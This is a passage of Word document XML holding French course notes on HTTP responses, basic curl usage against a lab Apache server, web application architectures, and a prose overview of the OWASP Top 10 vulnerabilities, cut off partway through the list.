        </w:rPr>
        <w:t xml:space="preserve">3 - Structure d’une réponse HTTP </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1847DF06" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="1843988A" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="122"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ligne de statut : Indique que la requête a été traiter avec succès ou non </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743F91D0" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="122"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">En-têtes : Infos sur la réponse (date de la réponse, type de contenu renvoyé et la longueur de la réponse) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C9D4CB" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="122"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Corps : Code HTML de la page demandée </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF54FE0" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6006464D" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="6BC3D09C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="90" w:name="_i2tojbup5qmz" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="90"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
        <w:t>4 - Mise en pratique du protocole HTTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5226EC4E" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="3A443B16" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="140"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Démarrage d’un serveur apache </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669B9128" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="47C76B50" wp14:editId="486CB2AE">
            <wp:extent cx="4510088" cy="1348531"/>
            <wp:effectExtent l="0" t="0" r="0" b="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4510088" cy="1348531"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="791CA762" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="140"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Affichage </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>du code sourde</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> de la page </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4E6478" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="140"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Aller dans le répertoire /var/www/html </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="697131D3" w14:textId="77777777" w:rsidR="00223B72" w:rsidRPr="00BD3814" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="140"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD3814">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>curl https://www.ccicampus.fr/pp2/html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36914A83" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="140"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Affichage de la réponse du serveur (c’est la </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>non répudiation</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE45BC7" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="140"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Curl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -I </w:t>
      </w:r>
      <w:hyperlink r:id="rId48">
        <w:r w:rsidR="00223B72">
          <w:rPr>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://192.168.1.96</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="19A1D97B" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="140"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Affichage de la réponse du serveur plus complète</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712104A5" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="1ABC1A4A" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="0D0F9627" wp14:editId="2A0020F3">
            <wp:extent cx="4024313" cy="3852733"/>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024313" cy="3852733"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D495589" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="41633BA4" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="16F3D860" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="23C08D87" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="91" w:name="_3yxc6nh559nd" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="91"/>
      <w:r>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Chapitre 2 - Les attaques courants contre les applications Web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0245CB" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="4B3C36BE" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="141"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="92" w:name="_9zoxioeryzkb" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="92"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
        <w:t xml:space="preserve">1 - Les différentes architecture des applications WEB  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600CE120" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="69257B1D" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="143"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="A61C00"/>
        </w:rPr>
        <w:t>Application à page unique (SPA)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> : une page, un site web ou une application qui fonctionne dans </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>un  navigateur</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> web et ne charge qu’un seul document Il n’est pas nécessaire de recharger la page pendant son utilisation, et la majeure partie de son contenu reste inchangée alors que seule une partie doit être mise à jour </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF0F65A" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0027CD57" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="990000"/>
        </w:rPr>
        <w:t>Microservices</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Permet de décomposer une app volumineuse en composants indépendants, chaque élément ayant ses propres responsabilités Une app basée sur des </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>microservices</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> peut appeler plusieurs </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>microservices</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> internes pour composer sa réponse </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FD32A3" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="990000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="398C5B40" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="990000"/>
        </w:rPr>
        <w:t>Sans serveur</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:  Cette architecture fait appel à des fournisseur de cloud </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>computing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> qui gèrent les serveurs et l’infrastructure, cela permet aux app de fonctionner sans se soucier de l’infra </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58958BC2" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C1F77E6" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E47BE5F" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="990000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="990000"/>
        </w:rPr>
        <w:t xml:space="preserve">Dans les trois modèles d’architecture, il existe des risques de sécurité </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015F1A42" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="93" w:name="_3k41dtesn2cf" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="93"/>
    </w:p>
    <w:p w14:paraId="387EFDFD" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="3D85C6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="94" w:name="_b3fvvbmnocik" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="94"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2 - </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Les  10</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> principales vulnérabilités pour OWASP (Open Web Application Security Project) en 2023. L’OWASP est une organisation à but non lucratif qui vise à améliorer la sécurité des logiciels en ligne </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE2AC99" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="65045F25" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Contrôle d’accès brisé</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C2E821" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Passé de la 5ème place en 2017 à la première place en 2021, le contrôle d’accès brisé reste une menace importante et permanente. Les contrôles d’accès limitent les utilisateurs aux ressources et fonctionnalités qu’ils sont autorisés à utiliser, et le contrôle d’accès rompu est le terme utilisé lorsqu’un système ne parvient pas à appliquer les restrictions appropriées. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17502417" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7885419F" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Échecs cryptographiques</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> : Cela figurait auparavant en troisième position et s’appelait “Exposition de données sensibles”, mais il a depuis été renommé car l’ancien nom décrivait un symptôme plutôt que la cause. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>La crypto</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> est utilisé pour protéger les données très sensible telles que les numéros de carte de crédit et les infos perso pendant leur transit, mais elle peut échouer en raison de facteurs tels que des algo de chiffrement faibles ou des clé de chiffrement </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B33649A" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DA73AE3" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Injection </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; L’injection a occupé la première place en 2017 et le cross-site </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>scripting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> la septième. Ils ont désormais été regroupés sous ce terme générique qui occupe actuellement la 3 position. Les attaques par injection exploitent les vulnérabilités de la validation des entrées et la gestion inadéquate des données.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438B1997" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A618AE6" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Conception non sécurisée</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> : Cette catégorie OWASP 2023 était nouvelle en 2021 et couvre les conceptions d’app défectueuses et les failles d’architecture que les pirates peuvent exploiter. Des vulnérabilités de conception non sécurisées surviennent lorsque les équipes n'adhèrent pas aux meilleures pratiques de sécurité et ne parviennent pas à anticiper et à évaluer correctement les menaces potentielles pendant la phase de conception du code de création de l’application. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1A799E" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61B850A1" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Mauvaise configuration de la sécurité</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> : Cette catégorie inclut désormais la catégorie Entités externes XML (XXE) de 2017. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Les ,mauvaise</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> config de sécu englobent une variété de vulnérabilités potentielles, mais voici les plus courantes; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FA0D19" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Vulné</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> non corrigées</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D56566" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Config par défaut</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229FFADC" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Pages inutilisées</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6786B0" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Fichiers et répertoires non protégés</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A6F3B1" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Services inutiles </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DF9A8D" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Utilisation de fichiers XML </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vulné</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1438F77B" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="687ADE82" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Composants vulnérables et obsolètes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> : Même les sites Web les plus simples ont de nombreuses dépendances telles que des </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>frameworks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, des bibliothèques, des extensions et des plugins, et chacun d’entre eux doit être tenu à jour. Les attaquants cherchent activement des sites Web comportant des composants vulnérables qu’ils peuvent exploiter pour propager des logiciels malveillants, lancer des attaques de phishing, etc. C’est pourquoi ne pas installer de mises à </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jou</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, quelle qu’en soit la raison est une mauvaise idée. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB6FD3D" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="231DE919" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Échecs d’identification et d’authentification </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Les échecs d’authentification et de gestion des identités exposent les app au risque que des acteurs malveillants se fassent passer pour de véritables utilisateurs. Un ID de session configuré sans période de validité peut s'exécuter. Les mdp faibles peuvent être susceptible d’être deviné et sans </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lulute</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> de </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>débit imposées</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> aux tentatives de connexion, les attaques auto continuent de le faire jusqu'à ce qu'elles réussissent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D84390D" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="648D80CF" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Défaillances des logiciels et de l’intégrité des données</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> : Il s’agit d’un type de défaut de conception. La complexité des architectures modernes signifie que </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>les dev</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ajoutent souvent des plugins et des biblio au pipelines à partir de diverses sources sans vérifier leur intégrité. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23938448" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D467407" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Échecs de journalisation et de surveillance de sécurité</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> : De mauvaises capacités de journalisation et de surveillance signifient que des incidents sont manqués et que des alertes ne sont pas générées, et </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>qu”ils</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> peuvent rester inaperçus suffisamment longtemps pour causer des dégâts importants. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DE2163" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EB39BB8" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
